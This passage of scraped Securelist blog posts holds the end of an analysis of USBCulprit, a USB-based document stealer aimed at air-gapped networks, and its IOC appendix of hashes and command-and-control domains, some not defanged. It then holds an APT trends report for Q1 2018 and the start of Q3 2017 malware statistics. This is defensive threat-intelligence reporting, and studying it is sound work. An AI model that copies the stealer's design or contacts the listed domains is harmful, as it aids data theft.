*.pdf;*.doc;*.wps;*docx;*ppt;*.xls;*.xlsx;*.pptx;*.rtf. Every document found is logged in a file that enlists all targeted paths for theft within a directory, such that every checked directory has a corresponding list file.\n\nThe chosen files are then grouped into encrypted RAR archives. To achieve that, the malware extracts a 'rar.exe' command line utility, hardcoded as a cabinet archive in its binary, and runs it against every list created in the former step. The password for the archive is initialized at the beginning of the malware's execution, and is set to 'abcd!@#$' for most variants that we observed.\n\nIt is worth noting that sought documents can be filtered by their modification date. Several variants of USBCulprit perform a check for a file named 'time' within the directory from which the malware is executed. This file is expected to have a date-time value that specifies the modification timestamp beyond which files are considered of interest and should be collected. If the 'time' file doesn't exist, it is created with the default value '20160601000000' corresponding to 01/06/2016 00:00:00.\n\n * **USB connection interception and data exfiltration/delivery**: when bootstrapping and data collection is completed, the malware attempts to intercept the connection of new media and verify that it corresponds to a removable drive. This is achieved by running an infinite loop, whereby the malware is put to sleep and wakes at constant intervals to check all connected drives with the GetDriveTypeW function. If at least one is of type DRIVE_REMOVABLE, further actions are taken.\n\nWhen a USB is connected, the malware will verify if stolen data should be exfiltrated to it or it already contains existing data that should be copied locally. To do this, a directory named '$Recyc1e.Bin' will be searched in the drive and if not found, will be created. This directory will be used as the target path for copying files to the drive or source path for obtaining them from it.\n\nTo understand which direction of file copy should take place, a special marker file named '1.txt' is searched locally. If it exists, the malware would expect to find the aforementioned '$Recyc1e.Bin' directory in the drive with previously stolen document archives and attempt to copy it to the disk. Otherwise, the local archive files will be copied to the same directory from the disk to the drive.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123634/cycldek_bridging_11.png>)\n\n**__Figure 10_: USBCulprit's check for the 1.txt marker, indicating if stolen files should be copied to the removable drive, or from it._**\n\n * **Lateral movement and extension**: as part of the same loop mentioned above, the existence of another marker file named '2.txt' will be checked locally to decide if lateral movement should be conducted or not. Only if this file exists, will the malware's binary be copied from its local path to the '$Recyc1e.Bin' directory. It's noteworthy that we were unable to spot any mechanism that could trigger the execution of the malware upon USB connection, which leads us to believe the malware is supposed to be run manually by a human handler.Apart from the above, USBCulprit is capable of updating itself or extending its execution with further modules. This is done by looking for the existence of predefined files in the USB and executing them. Examples for these include {D14030E9-C60C-481E-B7C2-0D76810C6E96} and {D14030E9-C60C-481E-B7C2-0D76810C6E95}.Unfortunately, we could not obtain those files during analysis and cannot tell what their exact purpose is. We can only guess that they are used as extension modules or updated versions of the malware itself based on their behavior. The former is an archive that is extracted to a specific directory that has its files enumerated and executed using an internal function named 'CUSB::runlist', while the latter is a binary that is copied to the %TEMP% directory and spawned as a new process.\n\nThe characteristics of the malware can give rise to several assumptions about its purpose and use cases, one of which is to reach and obtain data from air-gapped machines. This would explain the lack of any network communication in the malware, and the use of only removable media as a means of transferring inbound and outbound data. Also, we witnessed some variants issue commands to gather various pieces of host network information. These are logged to a file that is later transferred along with the stolen data to the USB and can help attackers profile whether the machine in which the malware was executed is indeed part of a segregated network.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/05/26123723/cycldek_bridging_12.png>)\n\n**__Figure 11_: Commands used to profile the network connectivity of the compromised host._**\n\nAnother explanation is that the malware was handled manually by operators on the ground. As mentioned earlier, there is no evident mechanism for automatically executing USBCulprit from infected media, and yet we saw that the same sample was executed from various drive locations, suggesting it was indeed spread around. This, along with the very specific files that the malware seeks as executable extensions and could not be found as artifacts elsewhere in our investigation, point to a human factor being required to assist deployment of the malware in victim networks.\n\n## Conclusion\n\nCycldek is an example of an actor that has broader capability than publicly perceived. While most known descriptions of its activity give the impression of a marginal group with sub-par capabilities, the range of tools and timespan of operations show that the group has an extensive foothold inside the networks of high-profile targets in Southeast Asia.\n\nFurthermore, our analysis of the implants affiliated to the group give an insight into its organizational structure. As already stated, the similarities and differences in various traits of these pieces of malware indicate that they likely originated from different arms of a single organization. Perhaps it's worth noting that we noted multiple points where such entities didn't work in a well-coordinated manner, for example, infecting machines using the BlueCore implant when they were already infected with RedCore.\n\nLastly, we believe that such attacks will continue in Southeast Asian countries. The use of different tools to reach air-gapped networks in the same countries and attempts to steal data from them have been witnessed in the past. Our analysis shows this type of activity has not ceased \u2013 it has merely evolved and changed shape, in terms of malware and actors. We continue to track the actor and report on its activity in our Threat Intelligence Portal.\n\nFor more information about Cycldek operations, contact us at: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>)\n\n### Appendix - IOCs\n\n_Note_: a full list of IOCs can be found in our reports on the subject in Kaspersky's Threat Intelligence Portal.\n\n**RedCore**:\n\nA6C751D945CFE84C918E88DF04D85798 - wsc.dll (side-loaded DLL) \n4B785345161D288D1652C1B2D5CEADA1 - msgsm64.acm (encrypted shellcode and implant)\n\n**BlueCore**:\n\n1B19175C41B9A9881B23B4382CC5935F - QcLite.dll (side-loaded DLL) \n6D2E6A61EEDE06FA9D633CE151208831 - QcLite.dll (side-loaded DLL) \n6EA33305B5F0F703F569B9EBD6035BFD - QcLite.dll (side-loaded DLL) \n600E14E4B0035C6F0C6A344D87B6C27F- stdole.tlb (encrypted Shellcode and Implant)\n\n**Lateral Movement and Info-Stealing Toolset:**\n\n1640EE7A414DFF996AF8265E0947DE36 Chromepass \n1EA07468EBDFD3D9EEC59AC57A490701 Chromepass \n07EE1B99660C8CD5207E128F44AA8CBC JsonCookies \n809196A64CA4A32860D28760267A1A8B Custom HDoor \n81660985276CF9B6D979753B6E581D34 Custom HDoor \nA44804C2767DCCD4902AAE30C36E62C0 Custom HDoor\n\n \n\n**USBCulprit: **\n\nA9BCF983FE868A275F8D9D8F5DEFACF5 USBCulprit Loader \nC73B000313DCD2289F51B367F744DCD8 USBCulprit Loader \n2FB731903BD12FF61E6F778FDF9926EE USBCulprit Loader \n4A21F9B508DB19398AEE7FE4AE0AC380 USBCulprit Loader \n6BE1362D722BA4224979DE91A2CD6242 USBCulprit Loader \n7789055B0836A905D9AA68B1D4A50F09 USBCulprit Loader \n782FF651F34C87448E4503B5444B6164 USBCulprit Loader \n88CDD3CE6E5BAA49DC69DA664EDEE5C1 USBCulprit Loader \nA4AD564F8FE80E2EE52E643E449C487D USBCulprit Loader \n3CA7BD71B30007FC30717290BB437152 USBCulprit Payload \n58FE8DB0F7AE505346F6E4687D0AE233 USBCulprit Payload \nA02E2796E0BE9D84EE0D4B205673EC20 USBCulprit Payload \nD8DB9D6585D558BA2D28C33C6FC61874 USBCulprit Payload \n2E522CE8104C0693288C997604AE0096 USBCulrprit Payload\n\n \n\n**Toolset overlapping in both clusters:**\n\n**Common Name ** | **MD5** | **Blue Cluster Domain** | **Red Cluster Domain** | **Description** \n---|---|---|---|--- \nchromepass.exe | 1EA07468EBDFD3D9EEC59AC57A490701 | http://login.vietnamfar.com:8080\n\n | http://news.trungtamwtoa.com:88 | ChromePass \ngoopdate.dll | D8DB9D6585D558BA2D28C33C6FC61874 | http://cophieu.dcsvnqvmn.com:8080 | http://mychau.dongnain.com:443\n\nhttp://hcm.vietbaonam.com:443 | USBCulprit \n2E522CE8104C0693288C997604AE0096 | http://nghiencuu.onetotechnologys.com:8080\n\nttp://tinmoi.thoitietdulich.com:443\n\nhttp://tinmoi.thoitietdulich.com:53 | http://tinmoi.vieclamthemde.com:53\n\nhttp://tinmoi.vieclamthemde.com | USBCulprit \nqclite.dll | 7FF0AF890B00DEACBF42B025DDEE8402 | http://web.hcmuafgh.com | http://tinmoi.vieclamthemde.com\n\nhttp://tintuc.daikynguyen21.com | BlueCore Loading Hijacked DLL \nsilverlightmsi.dat | A44804C2767DCCD4902AAE30C36E62C0 | http://web.laovoanew.com:443\n\nhttp://cdn.laokpl.com:8080 | http://login.dangquanwatch.com:53\n\nhttp://info.coreders.com:8080 | Custom HDoor \n \n \n\n**C&Cs and Dropzones**:\n\nhttp://web.laovoanew[.]com - Red Cluster\n\nhttp://tinmoi.vieclamthemde[.]com - Red Cluster\n\nhttp://kinhte.chototem[.]com - Red Cluster\n\nhttp://news.trungtamwtoa[.]com - Red Cluster\n\nhttp://mychau.dongnain[.]com - Red Cluster\n\nhttp://hcm.vietbaonam[.]com - Red Cluster\n\nhttp://login.thanhnienthegioi[.]com - Red Cluster\n\nhttp://103.253.25.73 - Red Cluster\n\nhttp://luan.conglyan[.]com - Red Cluster\n\nhttp://toiyeuvn.dongaruou[.]com - Red Cluster\n\nhttp://tintuc.daikynguyen21[.]com - Red Cluster\n\nhttp://web.laomoodwin[.]com - Red Cluster\n\nhttp://login.giaoxuchuson[.]com - Red Cluster\n\nhttp://lat.conglyan[.]com - Red Cluster\n\nhttp://thegioi.kinhtevanhoa[.]com - Red Cluster\n\nhttp://laovoanew[.]com - Red Cluster\n\nhttp://cdn.laokpl[.]com - Red Cluster\n\nhttp://login.dangquanwatch[.]com - Blue Cluster\n\nhttp://info.coreders[.]com - Blue Cluster\n\nhttp://thanhnien.vietnannnet[.]com - Blue Cluster\n\nhttp://login.diendanlichsu[.]com - Blue Cluster\n\nhttp://login.vietnamfar[.]com - Blue Cluster\n\nhttp://cophieu.dcsvnqvmn[.]com - Blue Cluster\n\nhttp://nghiencuu.onetotechnologys[.]com - Blue Cluster\n\nhttp://tinmoi.thoitietdulich[.]com - Blue Cluster\n\nhttp://khinhte.chinhsech[.]com - Blue Cluster\n\nhttp://images.webprogobest[.]com - Blue Cluster\n\nhttp://web.hcmuafgh[.]com - Blue Cluster\n\nhttp://news.cooodkord[.]com - Blue Cluster\n\nhttp://24h.tinthethaoi[.]com - Blue Cluster\n\nhttp://quocphong.ministop14[.]com - Blue Cluster\n\nhttp://nhantai.xmeyeugh[.]com - Blue Cluster\n\nhttp://thoitiet.yrindovn[.]com - Blue Cluster\n\nhttp://hanghoa.trenduang[.]com - Blue Cluster", "cvss3": {}, "published": "2020-06-03T10:00:32", "type": "securelist", "title": "Cycldek: Bridging the (air) gap", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2012-0158", "CVE-2017-11882", "CVE-2018-0802"], "modified": "2020-06-03T10:00:32", "id": "SECURELIST:833C831E498502BB46DD03F0C6F4D597", "href": "https://securelist.com/cycldek-bridging-the-air-gap/97157/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-25T08:42:52", "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2014/08/08074453/abstraction_2.jpg)\n\nIn the second quarter of 2017, Kaspersky's Global Research and Analysis Team (GReAT) began publishing summaries of the quarter's private threat intelligence reports in an effort to make the public aware of the research we have been conducting. This report serves as the next installment, focusing on the relevant activities that we observed during Q1 2018.\n\nThese summaries serve as a representative snapshot of what has been discussed in greater detail in our private reports, in order to highlight the significant events and findings that we feel people should be aware of. For brevity's sake, we are choosing not to publish indicators associated with the reports highlighted. However, if you would like to learn more about our intelligence reports or request more information on a specific report, readers are encouraged to contact: [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>).\n\n## **Remarkable new findings**\n\nWe are always very interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. In Q1 2018 we observed a bit of both, which are briefly summarized in this section.\n\nWe would like to start by highlighting all the new exploitation techniques applicable for the Meltdown/Spectre vulnerabilities that affect different CPU architectures and vendors. Even though we haven't seen any of them exploited in the wild so far (only several PoCs) and although vendors have provided various patches to mitigate them, there is still no real solution. The problem relies on the optimization methods used at the processor's architecture level. Given that a massive hardware replacement is not a realistic solution, Meltdown and Spectre might very well open the door to new infection vectors and persistence methods that we will see in the future.\n\nA similar case was the announcement of several flaws for AMD processors. Even when the full technical details were not yet available, AMD confirmed that these flaws could be exploited for privilege escalation and persistence once a target has been compromised.\n\nWe also observed an increasing interest from attackers, including sophisticated actors, in targeting routers and networking hardware. Some early examples of such attacks driven by advanced groups include Regin and CloudAtlas. Additionally, the US Government published an advisory on unusual reboots in a prominent router brand, which might indicate that these specific devices are being actively targeted.\n\nIn our Slingshot analysis, we described how the campaign was using Mikrotik routers as an infection vector, compromising the routers to later infect the final victim through the very peculiar mechanism that Mikrotik used for the remote management of devices. In actual fact, we recognised the interest of some actors in this particular brand when the Chimay-red exploit for Mikrotek was mentioned in Wikileak\u00b4s Vault7. This same exploit was later reused by the Hajime botnet in 2018, showing once again how dangerous leaked exploits can be. Even when the vulnerability was fixed by Mikrotik, networking hardware is rarely managed properly from a security perspective. Additionally, Mikrotik reported a zero day vulnerability ([CVE-2018-7445](<https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow>)) in March 2018.\n\nWe believe routers are still an excellent target for attackers, as demonstrated by the examples above, and will continue to be abused in order to get a foothold in the victim\u00b4s infrastructure.\n\nOne of the most relevant attacks during this first quarter of 2018 was the Olympic Destroyer malware, affecting several companies related to the Pyeongchang Olympic Games' organization and some Olympic facilities. There are different aspects of this attack to highlight, including the fact that attackers compromised companies that were providing services to the games\u00b4 organization in order to gain access, continuing the dangerous supply chain trend.\n\nBesides the technical considerations, one of the more open questions is related to the general perception that attackers could have done much more harm than they actually did, which opened some speculation as to what the real purpose of the attack was.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130221/180411-2018-Q1-APT-activity-1.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130221/180411-2018-Q1-APT-activity-1.png>)\n\n**_MZ DOS and Rich headers of both files (3c0d740347b0362331c882c2dee96dbf \u2013 OlympicDestroyer, 5d0ffbc8389f27b0649696f0ef5b3cfe \u2013 Bluenoroff) are exactly the same._**\n\nIn addition, a very relevant aspect is the effort attackers put in to planting several elaborative false flags, making this attack one of the most difficult we have analyzed in terms of attribution.\n\nIn February, we published a report about a previously unknown advanced Android backdoor that we call Skygofree. It seems that the author could be an Italian company selling the product in a similar way to how Hacking Team did in the past, however we don't yet have any proof of this. Interestingly, shortly after we detected the Android samples of this malware, we also found an early iOS version of the backdoor. In this case, attackers had abused a rogue MDM (Mobile Device Management) server in order to install their malware in victims' devices, probably using social engineering techniques to trick them into connecting with the rogue MDM.\n\nFinally, we would like to highlight three new actors that we have found, all of them focused in the Asia region:\n\n * Shaggypanther \u2013 A Chinese-speaking cluster of activity targeting government entities, mainly in Taiwan and Malaysia, active since 2008 and using hidden encrypted payloads in registry keys. We couldn't relate this to any known actor.\n * Sidewinder \u2013 An actor mainly targeting Pakistan military targets, active since at least 2012. We have low confidence that this malware might be authored by an Indian company. To spread the malware, they use unique implementations to leverage the exploits of known vulnerabilities (such as CVE-2017-11882) and later deploy a Powershell payload in the final stages.\n * CardinalLizard - We are moderately confident that this is a new collection of Chinese-speaking activity targeting businesses, active since 2014. Over the last few years, the group has shown an interest in the Philippines, Russia, Mongolia and Malaysia, the latter especially prevalent during 2018. The hackers use a custom malware featuring some interesting anti-detection and anti-emulation techniques. The infrastructure used also shows some overlaps with RomaingTiger and previous PlugX campaigns, but this could just be due to infrastructure reuse under the Chinese-speaking umbrella.\n\n## **Activity of well-known groups**\n\nSome of the most heavily tracked groups, especially those that are Russian-speaking, didn\u00b4t show any remarkable activity during the last three months, as far as we know.\n\nWe observed limited activity from Sofacy in distributing Gamefish, updating its Zebrocy toolset and potentially registering new domains that might be used for future campaigns. We also saw the group slowly shift its targeting to Asia during the last months.\n\nIn the case of Turla (Snake, Uroburos), the group was suspected of breaching the German Governmental networks, according to some reports. The breach was originally reported as Sofacy, but since then no additional technical details or official confirmation have been provided.\n\nThe apparent low activity of these groups - and some others such as The Dukes - could be related to some kind of internal reorganization, however this is purely speculative.\n\n## **Asia - high activity**\n\nThe ever-growing APT activity in this part of the World shouldn\u00b4t be a surprise, especially seeing as the Winter Olympic Games was hosted in South Korea in January 2018. More than 30% of our 27 reports during Q1 were focused on the region.\n\nProbably one of the most interesting activities relates to [Kimsuky](<https://securelist.com/the-kimsuky-operation-a-north-korean-apt/57915/\">), an actor with a North-Korean nexus interested in South Korean think tanks and political activities. The actor renewed its arsenal with a completely new framework designed for cyberespionage, which was used in a spear-phishing campaign against South Korean targets, similar to the one targeting [KHNP](<http://h21.hani.co.kr/arti/economy/economy_general/38919.html>) in 2014. According to McAfee, this activity was related to attacks against companies involved in the organization of the Pyeongchang Olympic Games, however we cannot confirm this.\n\nThe Korean focus continues with our analysis of the Flash Player 0-day vulnerability (CVE-2018-4878), deployed by Scarcruft at the end of January and triggered by Microsoft Word documents distributed through at least one website. This vulnerability was quickly reported by the Korean CERT (KN-CERT), which we believe helped to quickly mitigate any aggressive spreading. At the time of our analysis, we could only detect one victim in South Africa.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130229/180411-2018-Q1-APT-activity-2.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/04/11130229/180411-2018-Q1-APT-activity-2.png>)\n\n_Forgotten PDB path inside the malware used by Scarcruft with CVE-2018-4876_\n\nFurthermore, IronHusky is a Chinese-speaking actor that we first detected in summer 2017. It is very focused on tracking the geopolitical agenda of targets in central Asia with a special focus in Mongolia, which seems to be an unusual target. This actor crafts campaigns for upcoming events of interest. In this case, they prepared and launched one right before a meeting with the International Monetary Fund and the Mongolian government at the end of January 2018. At the same time, they stopped their previous operations targeting Russian military contractors, which speaks volumes about the group's limitations. In this new campaign, they exploited CVE-2017-11882 to spread common RATs typically used by Chinese-speaking groups, such as PlugX and PoisonIvy.\n\nThe final remark for this section covers the apparently never-ending greed of BlueNoroff, which has been moving to new targets among cryptocurrencies companies and expanding its operations to target PoS's. However, we haven\u00b4t observed any new remarkable changes in the modus operandi of the group.\n\n## **Middle East - always under pressure**\n\nThere was a remarkable peak in StrongPity's activity at the beginning of the year, both in January and March. For this new wave of attacks, the group used a new version of its malware that we simply call StrongPity2. However, the most remarkable aspect is the use of MiTM techniques at the ISP level to spread the malware, redirecting legitimate downloads to their artifacts. The group combines this method with registering domains that are similar to the ones used for downloading legitimate software.\n\nStrongPity also distributed FinFisher using the same MiTM method at the ISP level, more details of which were provided by CitizenLab.\n\nDesert Falcons showed a peak of activity at the end of 2017 and the beginning of 2018. Their toolset for this new campaign included Android implants that they had previously used back in 2014. The group continues to heavily rely on social engineering methods for malware distribution, and use rudimentary artifacts for infecting their victims. In this new wave we observed high-profile victims based mostly in Palestine, Egypt, Jordan, Israel, Lebanon and Turkey.\n\nA particularly interesting case we analyzed was the evolution of what we believe to be the Gaza Team actor. What makes us question whether this is the same actor that we have tracked in the past, is the fact that we observed a remarkable boost in the artifacts used by the group. We actually can\u00b4t be sure whether the group suddenly developed these new technical capabilities, or if they had some internal reorganization or acquired improved tools. Another possibility is that the group itself was somehow hacked and a third actor is now distributing their artifacts through them.\n\n## **Final Thoughts**\n\nAs a summary of what happened during the last 3 months, we have the impression that some well-known actors are rethinking their strategies and reorganizing their teams for future attacks. In addition, a whole new wave of attackers are becoming much more active. For all these new attackers we observe different levels of sophistication, but let\u00b4s admit that the entry barrier for cyberespionage is much lower than it used to be in terms of the availability of different tools that can be used for malicious activities. Powershell, for instance, is one of the most common resources used by any of them. In other cases, there seems to be a flourishing industry of malware development behind the authorship of the tools that have been used in several campaigns.\n\nSome of the big stories like Olympic Destroyer teach us what kind of difficulties we will likely find in the future in terms of attribution, while also illustrating how effective supply chain attacks still are. Speaking of new infection vectors, some of the CPU vulnerabilities discovered in the last few months will open new possibilities for attackers; unfortunately there is not an easy, universal protection mechanism for all of them. Routing hardware is already an infection vector for some actors, which should make us think whether we are following all the best practices in protecting such devices.\n\nWe will continue to track all the APT activity we can find and will regularly highlight the more interesting findings, but if you want to know more please reach out to us at intelreports@kasperksy.com.", "cvss3": {}, "published": "2018-04-12T10:00:17", "type": "securelist", "title": "APT Trends report Q1 2018", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-4876", "CVE-2018-4878", "CVE-2018-7445"], "modified": "2018-04-12T10:00:17", "href": "https://securelist.com/apt-trends-report-q1-2018/85280/", "id": "SECURELIST:1670EF82924C5F24DC777CBD3BA4AE5E", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-10T11:33:49", "description": "![](https://securelist.com/files/2016/11/quarter_threat.jpeg)\n\n## Q3 figures\n\nAccording to KSN data, Kaspersky Lab solutions detected and repelled **277,646,376 **malicious attacks from online resources located in 185 countries all over the world.\n\n**72,012,219** unique URLs were recognized as malicious by web antivirus components.\n\nAttempted infections by malware that aims to steal money via online access to bank accounts were registered on **204,388** user computers.\n\nCrypto ransomware attacks were blocked on **186283 **computers of unique users.\n\nKaspersky Lab's file antivirus detected a total of **198,228,428** unique malicious and potentially unwanted objects.\n\nKaspersky Lab mobile security products detected:\n\n * **1,598,196 **malicious installation packages;\n * **19,748** mobile banking Trojans (installation packages);\n * **108,073** mobile ransomware Trojans (installation packages).\n\n## Mobile threats\n\n### Q3 events\n\n#### The spread of the Asacub banker\n\nIn the third quarter, we continued to monitor the activity of the mobile banking Trojan Trojan-Banker.AndroidOS.Asacub that actively spread via SMS spam. Q3 saw cybercriminals carry out a major campaign to distribute the Trojan, resulting in a tripling of the number of users attacked. Asacub activity peaked in July, after which there was a decline in the number of attacks: in September we registered almost three times fewer attacked users than in July.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-1-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-1-en.jpg>)\n\nNumber of unique users attacked by Trojan-Banker.AndroidOS.Asacub in Q2 and Q3 2017\n\n#### New capabilities of mobile banking Trojans\n\nQ3 2017 saw two significant events in the world of mobile banking Trojans.\n\nFirstly, the family of mobile banking Trojans Svpeng has acquired the [new modification Trojan-Banker.AndroidOS.Svpeng.ae](<https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/>) capable of granting all the necessary rights to itself and stealing data from other applications. To do this, it just needs to persuade the user to allow the Trojan to utilize special functions designed for people with disabilities. As a result, the Trojan can intercept text that a user is entering, steal text messages and even prevent itself from being removed.\n\nInterestingly, in August we discovered yet another modification of Svpeng that uses special features. Only, this time the Trojan was not banking related \u2013 instead of stealing data, it encrypts all the files on a device and demands a ransom in bitcoins.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-2.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-2.jpg>)\n\nTrojan-Banker.AndroidOS.Svpeng.ag. window containing ransom demand\n\nSecondly, the FakeToken family of mobile banking Trojans [has expanded the list of apps it attacks](<https://securelist.com/booking-a-taxi-for-faketoken/81457/>). If previously representatives of this family mostly overlaid banking and some Google apps (e.g. Google Play Store) with a phishing window, it is now also overlaying apps used to book taxis, air tickets and hotels. The aim of the Trojan is to harvest data from bank cards.\n\n#### The growth of WAP billing subscriptions\n\nIn the third quarter of 2017, we continued to monitor the increased activity of Trojans designed to [steal](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) users' money via subscriptions. To recap, these are Trojans capable of visiting sites that allow users to pay for services by deducting money from their mobile phone accounts. These Trojans can usually click buttons on such sites using special JS files, and thus make payments without the user's knowledge.\n\nOur Top 20 most popular Trojan programs in Q3 2017 included three malware samples that attack WAP subscriptions. They are Trojan-Dropper.AndroidOS.Agent.hb and Trojan.AndroidOS.Loapi.b in fourth and fifth, and Trojan-Clicker.AndroidOS.Ubsod.b in seventh place.\n\n### Mobile threat statistics\n\nIn the third quarter of 2017, Kaspersky Lab detected 1,598,196 malicious installation packages, which is 1.2 times more than in the previous quarter.\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-3-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-3-en.jpg>)\n\nNumber of detected malicious installation packages (Q4 2016 \u2013 Q3 2017)\n\n#### Distribution of mobile malware by type\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-4-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-4-en.jpg>)\n\nDistribution of new mobile malware by type (Q2 and Q3 2017)\n\nRiskTool (53.44%) demonstrated the highest growth in Q3 2017, with its share increasing by 12.93 percentage points (p.p.). The majority of all installation packages discovered belonged to the RiskTool.AndroidOS.Skymobi family.\n\nTrojan-Dropper malware (10.97%) came second in terms of growth rate: its contribution increased by 6.29 p.p. Most of the installation packages are detected as Trojan-Dropper.AndroidOS.Agent.hb.\n\nThe share of Trojan-Ransom programs, which was first in terms of the growth rate in the first quarter of 2017, continued to fall and accounted for 6.69% in Q3, which is 8.4 p.p. less than the previous quarter. The percentage of Trojan-SMS malware also fell considerably to 2.62% \u2013 almost 4 p.p. less than in Q2.\n\nIn Q3, Trojan-Clicker malware broke into this rating after its contribution increased from 0.29% to 1.41% in the space of three months.\n\n#### TOP 20 mobile malware programs\n\n_Please note that this rating of malicious programs does not include potentially dangerous or unwanted programs such as RiskTool or adware._\n\n| Verdict | % of attacked users* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 67.14 \n2 | Trojan.AndroidOS.Boogr.gsh | 7.52 \n3 | Trojan.AndroidOS.Hiddad.ax | 4.56 \n4 | Trojan-Dropper.AndroidOS.Agent.hb | 2.96 \n5 | Trojan.AndroidOS.Loapi.b | 2.91 \n6 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.59 \n7 | Trojan-Clicker.AndroidOS.Ubsod.b | 2.20 \n8 | Backdoor.AndroidOS.Ztorg.c | 2.09 \n9 | Trojan.AndroidOS.Agent.gp | 2.05 \n10 | Trojan.AndroidOS.Sivu.c | 1.98 \n11 | Trojan.AndroidOS.Hiddapp.u | 1.87 \n12 | Backdoor.AndroidOS.Ztorg.a | 1.68 \n13 | Trojan.AndroidOS.Agent.ou | 1.63 \n14 | Trojan.AndroidOS.Triada.dl | 1.57 \n15 | Trojan-Ransom.AndroidOS.Zebt.a | 1.57 \n16 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.53 \n17 | Trojan.AndroidOS.Hiddad.an | 1.48 \n18 | Trojan.AndroidOS.Hiddad.ci | 1.47 \n19 | Trojan-Banker.AndroidOS.Asacub.ar | 1.41 \n20 | Trojan.AndroidOS.Agent.eb | 1.29 \n \n_* Percentage of unique users attacked by the malware in question, relative to all users of Kaspersky Lab's mobile security product that were attacked._\n\nFirst place was occupied by DangerousObject.Multi.Generic (67.14%), the verdict used for malicious programs detected using cloud technologies. This is basically how the very latest malware is detected.\n\nAs in the previous quarter, Trojan.AndroidOS.Boogr.gsh (7.52%) came second. This verdict is issued for files recognized as malicious by our system based on machine learning.\n\nTrojan.AndroidOS.Hiddad.an (4.56%) was third. The main purpose of this Trojan is to open and click advertising links received from the C&C. The Trojan requests administrator rights to prevent its removal.\n\nTrojan-Dropper.AndroidOS.Agent.hb (2.96%) climbed from sixth in Q2 to fourth this quarter. This Trojan decrypts and runs another Trojan \u2013 a representative of the Loaipi family. One of them \u2013Trojan.AndroidOS.Loapi.b \u2013 came fifth in this quarter's Top 20. This is a complex modular Trojan whose main malicious component needs to be downloaded from the cybercriminals' server. We can assume that Trojan.AndroidOS.Loapi.b is designed to steal money via paid subscriptions.\n\nTrojan-Dropper.AndroidOS.Hqwar.i (3.59%), the verdict used for Trojans protected by a certain packer/obfuscator, fell from fourth to sixth. In most cases, this name indicates representatives of the [FakeToken ](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Faketoken>)and [Svpeng ](<https://threats.kaspersky.com/en/threat/Trojan-Banker.AndroidOS.Svpeng>)mobile banking families.\n\nIn seventh was Trojan-Clicker.AndroidOS.Ubsod.b, a small basic Trojan that receives links from a C&C and opens them. We wrote about this family in more detail in our [review of Trojans](<https://securelist.com/wap-billing-trojan-clickers-on-rise/81576/>) that steal money using WAP subscriptions.\n\nTrojan Backdoor.AndroidOS.Ztorg.c came eighth. This is one of the most active advertising Trojans that uses superuser rights. In the third quarter of 2017, our Top 20 included eight Trojans that try to obtain or use root rights and which make use of advertising as their main means of monetization. Their goal is to deliver ads to the user more aggressively, applying (among other methods) hidden installation of new advertising programs. At the same time, superuser privileges help them 'hide' in the system folder, making it very difficult to remove them. It's worth noting that the quantity of this type of malware in the Top 20 has been decreasing (in Q1 2017, there were 14 of these Trojans in the rating, while in Q2 the number was 11).\n\nTrojan.AndroidOS.Agent.gp (2.05%), which steals money from users making calls to premium numbers, rose from fifteenth to ninth. Due to its use of administrator rights, it resists attempts to remove it from an infected device.\n\nOccupying fifteenth this quarter was Trojan-Ransom.AndroidOS.Zebt.a, the first ransom Trojan in this Top 20 rating in 2017. This is a fairly simple Trojan whose main goal is to block the device with its window and demand a ransom. Zebt.a tends to attack users in Europe and Mexico.\n\nTrojan.AndroidOS.Hiddad.an (1.48%) fell to sixteenth after occupying second and third in the previous two quarters. This piece of malware imitates various popular games or programs. Interestingly, once run, it downloads and installs the application it imitated. In this case, the Trojan requests administrator rights to withstand removal. The main purpose of Trojan.AndroidOS.Hiddad.an is the aggressive display of adverts. Its main 'audience' is in Russia.\n\n#### The geography of mobile threats\n\n[![](https://securelist.com/files/2017/11/q3-2017-statistics-5-en.jpg)](<https://securelist.com/files/2017/11/q3-2017-statistics-5-en.jpg>)\n\nThe geography of attempted mobile malware infections in Q3 2017 (percentage of all users attacked)\n\n**Top 10 countries attacked by mobile malware (ranked by percentage of users attacked):**\n\n| Country* | % of attacked users** \n---|---|--- \n1 | Iran | 35.12 \n2 | Bangladesh | 28.30 \n3 | China | 27.38 \n4 | C\u00f4te d'Ivoire | 26.22 \n5 | Algeria | 24.78 \n6 | Nigeria | 23.76 \n7 | Indonesia | 22.29 \n8 | India | 21.91 \n9 | Nepal | 20.78 \n10 | Kenya | 